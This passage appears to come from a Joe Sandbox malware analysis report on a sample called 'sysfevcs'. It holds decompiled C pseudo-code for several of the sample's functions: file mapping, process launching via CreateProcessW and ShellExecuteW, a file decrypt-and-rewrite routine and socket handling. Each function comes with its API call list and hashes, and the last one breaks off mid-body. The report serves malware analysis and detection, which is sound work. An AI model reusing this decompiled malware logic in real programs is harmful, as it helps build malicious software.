                                                                                                                                                                                                                                                                  0x0040ba58
                                                                                                                                                                                                                                                                  0x0040ba5e
                                                                                                                                                                                                                                                                  0x0040ba5e
                                                                                                                                                                                                                                                                  0x0040ba3c
                                                                                                                                                                                                                                                                  0x0040ba3c
                                                                                                                                                                                                                                                                  0x0040ba8e
                                                                                                                                                                                                                                                                  0x0040ba9c
                                                                                                                                                                                                                                                                  0x0040baad
                                                                                                                                                                                                                                                                  0x0040babc
                                                                                                                                                                                                                                                                  0x0040babe
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040baaf
                                                                                                                                                                                                                                                                  0x0040bab2
                                                                                                                                                                                                                                                                  0x0040bab5
                                                                                                                                                                                                                                                                  0x0040bab8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040baba
                                                                                                                                                                                                                                                                  0x0040bab8
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x0040ba9e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ba9c
                                                                                                                                                                                                                                                                  0x0040ba0c
                                                                                                                                                                                                                                                                  0x0040b9fa
                                                                                                                                                                                                                                                                  0x0040bac9
                                                                                                                                                                                                                                                                  0x0040bad4
                                                                                                                                                                                                                                                                  0x0040bae0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040B9B6
                                                                                                                                                                                                                                                                  • GetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF,?,0040E9A4), ref: 0040B9BD
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040B9C8
                                                                                                                                                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF,?,0040E9A4), ref: 0040B9CF
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(000000FF,00000000), ref: 0040B9F2
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000FB), ref: 0040BA27
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040BA72
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040BA8E
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 0040BABE
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0040BACD
                                                                                                                                                                                                                                                                  • SetThreadPriority.KERNEL32(00000000,?,0040DEEE,?,000000FF), ref: 0040BAD4
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3862671961-0
                                                                                                                                                                                                                                                                  • Opcode ID: e02cfc6e931c3f5b5f27e624d3331d9921decd7a09dd22ec20462e0f7b40d9ad
                                                                                                                                                                                                                                                                  • Instruction ID: 60dba0ed44522af60a36c0c27669d54f94d2e7ae5eee10216e3926d5ce6a7601
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e02cfc6e931c3f5b5f27e624d3331d9921decd7a09dd22ec20462e0f7b40d9ad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23410AB4A00209EBDB14CFA4C948BAEBB75EF44315F10817AE911B7781D7389A45CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409A60() {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				DWORD* _v28;
                                                                                                                                                                                                                                                                  				signed int _v32;
                                                                                                                                                                                                                                                                  				void* _t74;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				InitializeCriticalSection(0x4139ac);
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				while(_v12 < 0x200) {
                                                                                                                                                                                                                                                                  					E00409750( *((intOrPtr*)(0x4123b8 + _v12 * 4)), E0040BB80(), 0);
                                                                                                                                                                                                                                                                  					_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                  					_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v8 = CreateFileW(0x4137a0, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v8 != 0xffffffff) {
                                                                                                                                                                                                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v16 != 0) {
                                                                                                                                                                                                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v20 != 0) {
                                                                                                                                                                                                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                                                                                                                                                                                                  							_v28 = 0;
                                                                                                                                                                                                                                                                  							_v32 = 0;
                                                                                                                                                                                                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                                                                                                                                                                                                  								E00409750( *((intOrPtr*)(_v20 + _v32 * 8)), E0040BB80() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                                                                                                                                                                                                  								_t74 = _t74 + 0xc;
                                                                                                                                                                                                                                                                  								_v28 =  &(_v28[2]);
                                                                                                                                                                                                                                                                  								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							UnmapViewOfFile(_v20);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					CloseHandle(_v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E00409470();
                                                                                                                                                                                                                                                                  				return E0040B8C0( *0x4139c8, 0, E00409340, 0, 0, 0);
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x00409a6b
                                                                                                                                                                                                                                                                  0x00409a71
                                                                                                                                                                                                                                                                  0x00409a83
                                                                                                                                                                                                                                                                  0x00409a9f
                                                                                                                                                                                                                                                                  0x00409aa4
                                                                                                                                                                                                                                                                  0x00409a80
                                                                                                                                                                                                                                                                  0x00409a80
                                                                                                                                                                                                                                                                  0x00409ac3
                                                                                                                                                                                                                                                                  0x00409aca
                                                                                                                                                                                                                                                                  0x00409ae4
                                                                                                                                                                                                                                                                  0x00409aeb
                                                                                                                                                                                                                                                                  0x00409b03
                                                                                                                                                                                                                                                                  0x00409b0a
                                                                                                                                                                                                                                                                  0x00409b18
                                                                                                                                                                                                                                                                  0x00409b1b
                                                                                                                                                                                                                                                                  0x00409b22
                                                                                                                                                                                                                                                                  0x00409b3d
                                                                                                                                                                                                                                                                  0x00409b6a
                                                                                                                                                                                                                                                                  0x00409b6f
                                                                                                                                                                                                                                                                  0x00409b31
                                                                                                                                                                                                                                                                  0x00409b3a
                                                                                                                                                                                                                                                                  0x00409b3a
                                                                                                                                                                                                                                                                  0x00409b78
                                                                                                                                                                                                                                                                  0x00409b78
                                                                                                                                                                                                                                                                  0x00409b82
                                                                                                                                                                                                                                                                  0x00409b82
                                                                                                                                                                                                                                                                  0x00409b8c
                                                                                                                                                                                                                                                                  0x00409b8c
                                                                                                                                                                                                                                                                  0x00409b92
                                                                                                                                                                                                                                                                  0x00409bb5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(004139AC,?,?,?,?,?,?,0040627D), ref: 00409A6B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(004137A0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00409ABD
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00409ADE
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00409AFD
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 00409B12
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 00409B78
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409B82
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409B8C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: NtQuerySystemTime.NTDLL ref: 0040BB8A
                                                                                                                                                                                                                                                                    • Part of subcall function 0040BB80: RtlTimeToSecondsSince1980.NTDLL ref: 0040BB98
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                                  • String ID: }b@
                                                                                                                                                                                                                                                                  • API String ID: 439099756-2189388452
                                                                                                                                                                                                                                                                  • Opcode ID: 0587c9255b2073be9bfe5c4dab8d6581e761a33ab3f578c66cae7c8798824dce
                                                                                                                                                                                                                                                                  • Instruction ID: 05997d6a355e4161d2a20ee8ba5da767b4ee5e7179cc67c9ae833650239d72a7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0587c9255b2073be9bfe5c4dab8d6581e761a33ab3f578c66cae7c8798824dce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1414F74E40208EBDB10DFE4DD4AFAEB770BB44715F208169E611BB2C2C6B86945CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040D0B0(char _a4) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                  				struct _STARTUPINFOW _v100;
                                                                                                                                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				memset( &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                  				_v24.hProcess = 0;
                                                                                                                                                                                                                                                                  				_v24.hThread = 0;
                                                                                                                                                                                                                                                                  				_v24.dwProcessId = 0;
                                                                                                                                                                                                                                                                  				_v24.dwThreadId = 0;
                                                                                                                                                                                                                                                                  				_v100.cb = 0x44;
                                                                                                                                                                                                                                                                  				_v100.dwFlags = 1;
                                                                                                                                                                                                                                                                  				_v100.wShowWindow = 5;
                                                                                                                                                                                                                                                                  				_t11 =  &_a4; // 0x405f4b
                                                                                                                                                                                                                                                                  				if(CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24) != 1) {
                                                                                                                                                                                                                                                                  					_t12 =  &_a4; // 0x405f4b
                                                                                                                                                                                                                                                                  					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                                                                                                                                                                                                  					_v104 = _v8;
                                                                                                                                                                                                                                                                  					if(_v104 <= 0x20) {
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					Sleep(0x3e8);
                                                                                                                                                                                                                                                                  					return 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				return 1;
                                                                                                                                                                                                                                                                  			}







                                                                                                                                                                                                                                                                  0x0040d0be
                                                                                                                                                                                                                                                                  0x0040d0c8
                                                                                                                                                                                                                                                                  0x0040d0cb
                                                                                                                                                                                                                                                                  0x0040d0ce
                                                                                                                                                                                                                                                                  0x0040d0d1
                                                                                                                                                                                                                                                                  0x0040d0d4
                                                                                                                                                                                                                                                                  0x0040d0db
                                                                                                                                                                                                                                                                  0x0040d0e7
                                                                                                                                                                                                                                                                  0x0040d0ff
                                                                                                                                                                                                                                                                  0x0040d10e
                                                                                                                                                                                                                                                                  0x0040d125
                                                                                                                                                                                                                                                                  0x0040d136
                                                                                                                                                                                                                                                                  0x0040d13c
                                                                                                                                                                                                                                                                  0x0040d143
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d154
                                                                                                                                                                                                                                                                  0x0040d14a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d150
                                                                                                                                                                                                                                                                  0x0040d115
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.NTDLL ref: 0040D0BE
                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 0040D105
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D115
                                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,K_@,00000000,00000000,00000000), ref: 0040D130
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D14A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                                                                                                                                                                                                  • String ID: $D$K_@$open
                                                                                                                                                                                                                                                                  • API String ID: 2222793131-44698946
                                                                                                                                                                                                                                                                  • Opcode ID: 6067ea38031c6e29b4dcc7b44fd310710b4567a6e9dad4b403b401856a848b2f
                                                                                                                                                                                                                                                                  • Instruction ID: 5b9e7ff7f959b24c41b671f48102102a5a22ad29d8e5895e5d8be873d8d12d20
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6067ea38031c6e29b4dcc7b44fd310710b4567a6e9dad4b403b401856a848b2f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D111FE71E44308EBEB14DF94DD46B9E7774AB44B00F20413AF609BA2C1D6B55A04CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                                                                                                  			E0040CEF0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				DWORD* _v20;
                                                                                                                                                                                                                                                                  				char _v21;
                                                                                                                                                                                                                                                                  				void* _v28;
                                                                                                                                                                                                                                                                  				void* _v32;
                                                                                                                                                                                                                                                                  				char _v48;
                                                                                                                                                                                                                                                                  				DWORD* _t70;
                                                                                                                                                                                                                                                                  				void* _t73;
                                                                                                                                                                                                                                                                  				void* _t103;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v21 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v16 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					L12:
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						_v16 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  							_v21 = 1;
                                                                                                                                                                                                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0);
                                                                                                                                                                                                                                                                  							CloseHandle(_v16);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990(_v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					return _v21;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v28 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v28 == 0) {
                                                                                                                                                                                                                                                                  					L11:
                                                                                                                                                                                                                                                                  					CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					goto L12;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v32 = MapViewOfFile(_v28, 4, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v32 == 0) {
                                                                                                                                                                                                                                                                  					L10:
                                                                                                                                                                                                                                                                  					CloseHandle(_v28);
                                                                                                                                                                                                                                                                  					goto L11;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                                                                                                                                                                                                  					if(_v12 > 0x100) {
                                                                                                                                                                                                                                                                  						_t70 = E0040AF00(_v32, _v32);
                                                                                                                                                                                                                                                                  						_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                  						_v20 = _t70;
                                                                                                                                                                                                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                                                                                                                                                                                                  							_v12 = _v20[6];
                                                                                                                                                                                                                                                                  							_t73 = E0040A8A0(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                                                                                                                                                                                                  							_t103 = _t103 + 0x10;
                                                                                                                                                                                                                                                                  							_v8 = _t73;
                                                                                                                                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                                                                                                                                  								E004091E0(_v8, _v12,  &_v48);
                                                                                                                                                                                                                                                                  								_t103 = _t103 + 0xc;
                                                                                                                                                                                                                                                                  								asm("repe cmpsd");
                                                                                                                                                                                                                                                                  								if(0 != 0) {
                                                                                                                                                                                                                                                                  									E00408990(_v8);
                                                                                                                                                                                                                                                                  									_t103 = _t103 + 4;
                                                                                                                                                                                                                                                                  									_v8 = 0;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					UnmapViewOfFile(_v32);
                                                                                                                                                                                                                                                                  					goto L10;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}














                                                                                                                                                                                                                                                                  0x0040cef8
                                                                                                                                                                                                                                                                  0x0040cefc
                                                                                                                                                                                                                                                                  0x0040cf03
                                                                                                                                                                                                                                                                  0x0040cf0a
                                                                                                                                                                                                                                                                  0x0040cf2a
                                                                                                                                                                                                                                                                  0x0040cf31
                                                                                                                                                                                                                                                                  0x0040d043
                                                                                                                                                                                                                                                                  0x0040d047
                                                                                                                                                                                                                                                                  0x0040d062
                                                                                                                                                                                                                                                                  0x0040d069
                                                                                                                                                                                                                                                                  0x0040d06b
                                                                                                                                                                                                                                                                  0x0040d081
                                                                                                                                                                                                                                                                  0x0040d08b
                                                                                                                                                                                                                                                                  0x0040d08b
                                                                                                                                                                                                                                                                  0x0040d095
                                                                                                                                                                                                                                                                  0x0040d09a
                                                                                                                                                                                                                                                                  0x0040d0a5
                                                                                                                                                                                                                                                                  0x0040d0a5
                                                                                                                                                                                                                                                                  0x0040cf4b
                                                                                                                                                                                                                                                                  0x0040cf52
                                                                                                                                                                                                                                                                  0x0040d039
                                                                                                                                                                                                                                                                  0x0040d03d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d03d
                                                                                                                                                                                                                                                                  0x0040cf6a
                                                                                                                                                                                                                                                                  0x0040cf71
                                                                                                                                                                                                                                                                  0x0040d02f
                                                                                                                                                                                                                                                                  0x0040d033
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040cf77
                                                                                                                                                                                                                                                                  0x0040cf83
                                                                                                                                                                                                                                                                  0x0040cf8d
                                                                                                                                                                                                                                                                  0x0040cf97
                                                                                                                                                                                                                                                                  0x0040cf9c
                                                                                                                                                                                                                                                                  0x0040cf9f
                                                                                                                                                                                                                                                                  0x0040cfa6
                                                                                                                                                                                                                                                                  0x0040cfbf
                                                                                                                                                                                                                                                                  0x0040cfd9
                                                                                                                                                                                                                                                                  0x0040cfde
                                                                                                                                                                                                                                                                  0x0040cfe1
                                                                                                                                                                                                                                                                  0x0040cfe8
                                                                                                                                                                                                                                                                  0x0040cff6
                                                                                                                                                                                                                                                                  0x0040cffb
                                                                                                                                                                                                                                                                  0x0040d00e
                                                                                                                                                                                                                                                                  0x0040d010
                                                                                                                                                                                                                                                                  0x0040d016
                                                                                                                                                                                                                                                                  0x0040d01b
                                                                                                                                                                                                                                                                  0x0040d01e
                                                                                                                                                                                                                                                                  0x0040d01e
                                                                                                                                                                                                                                                                  0x0040d010
                                                                                                                                                                                                                                                                  0x0040cfe8
                                                                                                                                                                                                                                                                  0x0040cfa6
                                                                                                                                                                                                                                                                  0x0040d029
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d029

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040CF24
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040CF45
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040CF64
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CF7D
                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D029
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D033
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D03D
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D05C
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D081
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D08B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 171974401-0
                                                                                                                                                                                                                                                                  • Opcode ID: 89653246819a8efb5379b0b23a728ec50d444909ce18eb7c69d008aa292c201d
                                                                                                                                                                                                                                                                  • Instruction ID: 0e99ab12e2f06471f33da5b613d817b3e723ed7e49a2bb816a75a8e19955daac
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89653246819a8efb5379b0b23a728ec50d444909ce18eb7c69d008aa292c201d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 215170B5E00208EBDB10DFE4DC49BAFB774AB48304F108569E614BB2C0D7786A45CB98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040E560(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                                                                                                                                                                                                  				long _v4;
                                                                                                                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				char _v28;
                                                                                                                                                                                                                                                                  				void* __esi;
                                                                                                                                                                                                                                                                  				intOrPtr _t59;
                                                                                                                                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                                                                                                                                  				void* _t73;
                                                                                                                                                                                                                                                                  				void* _t106;
                                                                                                                                                                                                                                                                  				void* _t108;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t108 = __eax;
                                                                                                                                                                                                                                                                  				_t106 = __ecx;
                                                                                                                                                                                                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                                                                                                                                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  					_a4 = 1;
                                                                                                                                                                                                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                                                                                                                                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                                                                                                                                                                                                  					_a6 = 0;
                                                                                                                                                                                                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                                                                                                                                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                  					return _t59;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				InterlockedExchange(_t106 + 4, E0040BB80());
                                                                                                                                                                                                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                                                                                                                                                                                                  				if(_t64 == 0) {
                                                                                                                                                                                                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                                                                                                                                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                                                                                                                                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                                                                                                                                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                                                                                                                                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                                                                                                                                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                                                                                                                                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
